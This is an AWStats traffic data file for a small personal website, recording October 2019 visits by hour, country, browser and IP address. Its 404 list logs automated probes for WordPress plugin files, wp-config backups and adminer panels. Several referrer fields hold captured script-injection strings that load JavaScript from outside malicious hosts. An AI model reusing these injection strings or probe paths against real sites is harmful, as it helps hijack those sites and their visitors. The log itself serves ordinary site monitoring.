AWSTATS DATA FILE 7.7 (build 20180105)
# If you remove this file, all statistics for date 201910 will be lost/reset.
# Last config file used to build this data file was /home/bailey/tmp/awstats/ssl/awstats.baileyhulsey.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2015                
POS_TIME 2674                
POS_VISITOR 9119                
POS_DAY 11529               
POS_DOMAIN 3243                
POS_LOGIN 3541                
POS_ROBOT 3696                
POS_WORMS 3874                
POS_EMAILSENDER 4005                
POS_EMAILRECEIVER 4148                
POS_SESSION 12158               
POS_SIDER 12333               
POS_FILETYPES 4283                
POS_DOWNLOADS 4365                
POS_OS 4413                
POS_BROWSER 4571                
POS_SCREENSIZE 4820                
POS_UNKNOWNREFERER 4894                
POS_UNKNOWNREFERERBROWSER 5481                
POS_ORIGIN 5635                
POS_SEREFERRALS 5767                
POS_PAGEREFS 5911                
POS_SEARCHWORDS 6059                
POS_KEYWORDS 6211                
POS_MISC 2338                
POS_ERRORS 6270                
POS_CLUSTER 3397                
POS_SIDER_404 6369                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20191101114312 1 0 10913333454826
FirstTime 0
LastTime 20191031164909
LastUpdate 20191102070952 1 0 0 0 0
TotalVisits 77                  
TotalUnique 63                  
MonthHostsKnown 0                   
MonthHostsUnknown 63                  
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
WindowsMediaPlayerSupport 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
AddToFavourites 0 0 0
QuickTimeSupport 0 0 0
DirectorSupport 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
JavaEnabled 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 1 1 511 0 0 0
1 3 3 1533 0 0 0
2 4 4 2044 0 4 0
3 2 2 1022 0 2 0
4 1 1 511 92 93 5110
5 0 0 0 97 99 5621
6 10 10 5110 2 3 1022
7 8 8 4088 8 10 0
8 5 5 2555 1 5 511
9 9 9 4599 8 9 1022
10 5 5 1533 1 1 511
11 5 5 2555 1 1 511
12 8 8 4088 0 2 0
13 8 8 3577 0 2 0
14 15 15 7665 0 2 0
15 5 5 2555 2 6 1022
16 1 1 511 0 0 0
17 0 0 0 0 0 0
18 0 0 0 0 0 0
19 2 2 511 2 4 1022
20 1 1 511 11 32 1022
21 0 0 0 0 0 0
22 0 0 0 2 2 1022
23 0 0 0 1 3 511
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 7
us 49 49 24528
ru 27 27 13797
de 12 12 5110
gb 2 2 1022
cn 1 1 511
ca 1 1 511
au 1 1 0
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 1
bot[\s_+:,\.\;\/\\-] 13 6643 20191029194452 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 1
html 93 45479 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 8
win10 58 58
win7 3 3
Unknown 26 26
win2003 1 1
win8.1 1 1
linux 2 2
winlong 1 1
macosx11 1 1
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 10
firefox47.0 1 1
chrome71.0.3578.98 28 28
mozilla 14 14
msie6.0 1 1
chrome68.0.3440.106 1 1
Unknown 12 12
chrome76.0.3809.100 2 2
chrome0.2.151.0 1 1
chrome66.0.3359.181 30 30
chrome40.0.2214.85 3 3
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 6
Mozilla/5.0_zgrab/0.x_(compatible;_Researchscan/t12sns;__http://researchscan.comsys.rwth-aachen.de) 20191026021412
Mozilla/5.0_zgrab/0.x_(compatible;_Researchscan/t13rl;__http://researchscan.comsys.rwth-aachen.de) 20191026030712
Mozilla/5.0_(compatible;_NetcraftSurveyAgent/1.0;__info@netcraft.com) 20191008200159
Go-http-client/1.1 20191031061503
Mozilla/5.0_zgrab/0.x_(compatible;_Researchscan/t12ca;__http://researchscan.comsys.rwth-aachen.de) 20191026013538
python-requests/2.21.0 20191015073936
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 2
python-requests/2.21.0 20191015073936
Go-http-client/1.1 20191031061503
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 93 93
From1 0 0
From2 0 0
From3 0 0
From4 0 0
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 0
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 0
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
206 24 12264
404 243 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 49
/wp-content/plugins/delucks-seo/modules/professional/breadcrumbs/assets/css/frontend.css 1 -
/wp-content/plugins/insert-php/admin/assets/js/tag-it.js 1 -
/connect.php 1 -
/shop/ 2 -
/wp-content/plugins/wp-database-backup/assets/js/jquery.dataTables.js 1 -
/wp-content/plugins/simple-301-redirects-addon-bulk-uploader/assets/css/notices.css 1 -
/wp-content/plugins/wd-instagram-feed/css/wdi_frontend.min.css 1 -
/wp-content/plugins/wp-slimstat/wp-slimstat.min.js 1 -
/wp-content/plugins/rich-reviews/css/rich-reviews.css 1 -
/wp-admin/admin-ajax.php 56 -
/wp-content/plugins/wp-shopify/dist/public.min.css 1 -
/wp-content/plugins/lifterlms/assets/chosen/chosen.min.css 1 -
/catalog/ 2 -
/wp-content/plugins/wpshopify/dist/public.min.css 1 -
/wp-config.php 2 -
/robots.txt 14 -
/wp-json/wpshopify/v1/settings 2 -
/_adminer.php 1 -
/wp-content/plugins/insta-gallery/assets/insta-gallery-min.css 1 -
/store/ 2 -
/adm.php 1 -
/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css 1 -
/ad.php 1 -
/wp-content/uploads/file-manager/log.txt 1 -
/wp-content/plugins/social-polls-by-opinionstage/assets/content-popup/ 1 -
/wp-content/plugins/simple-fields/js/chosen/chosen.css 1 -
/3 1 -
/wp-admin 1 \"><script%20type=text/javascript%20src='https://cd.privacylocationforloc.com/track&tp=3'></script>
/wp-login.php 7 \"><script%20type=text/javascript%20src='https://js.balantfromsun.com/black.js
/wp-content/plugins/wp-inventory-manager/themes/css/default-theme.css 1 -
/2 1 -
/main.css 2 https://baileyhulsey.com/
/ads.txt 14 -
/wp-content/plugins/ithemes-sync/js/settings-page.js 1 -
/Adminer.php 1 -
/wp-json/visualizer/v1/update-chart 4 -
//wp-login.php 7 \"><script%20type=text/javascript%20src='https://cd.privacylocationforloc.com/track&tp=3'></script>
/wp-content/plugins/easy2map/scripts/jquery.xml2json.js 1 -
/wp-content/plugins/download-plugins-dashboard/includes/js/theme_download_link.js 1 -
/ 2 \"><script%20type=text/javascript%20src='https://js.balantfromsun.com/black.js
/wp-admin/wp-login.php 7 \"><script%20type=text/javascript%20src='https://cd.privacylocationforloc.com/track&tp=3'></script>
/wp-admin/admin-post.php 84 -
/wp-content/plugins/visualizer/js/media.js 1 -
/wp-config.php~ 2 -
/adminer.php 1 -
/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css 1 -
/wp-content/plugins/social-metrics-tracker/css/social-metrics-tracker.min.css 1 -
/cart/ 2 -
/wp-content/plugins/wpematico/app/js/wpe_hooks.js 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 63
77.74.177.113 14 14 7154 20191011134232
77.74.177.114 6 6 3066 20191011124340
137.226.113.26 5 5 2555 20191026013538
104.194.203.5 3 3 1533 20191011131303
137.226.113.27 3 3 1533 20191026030712
89.208.29.224 2 2 1022 20191011101455
93.159.230.28 2 2 1022 20191011091852
137.226.113.28 2 2 1022 20191019014052
138.246.253.5 2 2 0 20191026192329
54.70.0.171 1 1 511 20191012093348
34.220.222.145 1 1 511 20191008151435
80.84.57.113 1 1 511 20191005075133
54.190.243.198 1 1 511 20191024135937
54.245.10.80 1 1 511 20191026125347
34.215.203.70 1 1 511 20191015122436
54.202.203.248 1 1 511 20191019140008
52.11.255.178 1 1 511 20191011090035
34.219.98.172 1 1 511 20191025144236
159.89.183.246 1 1 511 20191008022638
35.161.72.240 1 1 511 20191004061208
82.202.161.133 1 1 511 20191004150510
34.222.189.143 1 1 511 20191019090423
54.185.163.205 1 1 511 20191010151352
45.55.41.245 1 1 511 20191008200159
18.236.233.240 1 1 511 20191020142106
185.195.237.157 1 1 511 20191011065253
52.27.113.63 1 1 511 20191031164909
18.236.164.12 1 1 511 20191021124937
52.34.173.58 1 1 511 20191010060755
54.71.50.14 1 1 511 20191005115245
35.162.190.56 1 1 511 20191027141246
34.217.42.155 1 1 511 20191013143216
54.202.8.193 1 1 511 20191011145143
52.40.71.44 1 1 511 20191029125929
54.190.102.241 1 1 511 20191023144903
129.78.110.131 1 1 0 20191008102215
54.202.20.230 1 1 511 20191016144039
34.216.138.95 1 1 511 20191014084839
52.12.65.16 1 1 511 20191031061503
54.244.58.94 1 1 511 20191012141544
35.166.174.206 1 1 511 20191018142711
54.188.22.95 1 1 511 20191015073936
45.55.46.103 1 1 511 20191008195637
18.237.240.135 1 1 511 20191030093612
60.191.38.77 1 1 511 20191021102217
34.214.121.44 1 1 511 20191006143339
80.84.57.97 1 1 511 20191005075142
159.203.17.35 1 1 0 20191021131754
54.184.117.55 1 1 511 20191025060251
157.245.2.60 1 1 511 20191008043458
34.219.154.126 1 1 511 20191009153307
54.186.65.211 1 1 511 20191015092109
35.163.182.68 1 1 511 20191017135559
54.244.106.0 1 1 511 20191004155024
34.214.18.150 1 1 511 20191002073155
213.159.213.236 1 1 511 20191012061525
34.220.240.86 1 1 511 20191007144241
34.222.221.239 1 1 511 20191028143808
54.186.209.183 1 1 511 20191022145005
52.32.156.116 1 1 511 20191014142232
54.188.219.226 1 1 511 20191017092136
54.148.252.41 1 1 511 20191004060452
54.203.177.110 1 1 511 20191030132531
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 29
20191002 1 1 511 1
20191004 4 4 2044 4
20191005 5 5 2555 5
20191006 2 2 1022 2
20191007 1 1 511 1
20191008 6 6 2555 6
20191009 1 1 511 1
20191010 2 2 1022 2
20191011 30 30 15330 15
20191012 6 6 2555 6
20191013 1 1 511 1
20191014 2 2 1022 2
20191015 3 3 1533 3
20191016 1 1 511 1
20191017 2 2 1022 2
20191018 2 2 1022 2
20191019 3 3 1533 3
20191020 1 1 511 1
20191021 3 3 1022 3
20191022 1 1 511 1
20191023 1 1 511 1
20191024 1 1 511 1
20191025 2 2 1022 2
20191026 5 5 2044 4
20191027 1 1 511 1
20191028 1 1 511 1
20191029 1 1 511 1
20191030 2 2 1022 2
20191031 2 2 1022 2
END_DAY

# Session range - Number of visits
BEGIN_SESSION 4
30mn-1h 1
1h+ 3
15mn-30mn 2
0s-30s 71
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 1
/ 93 45479 77 77
END_SIDER
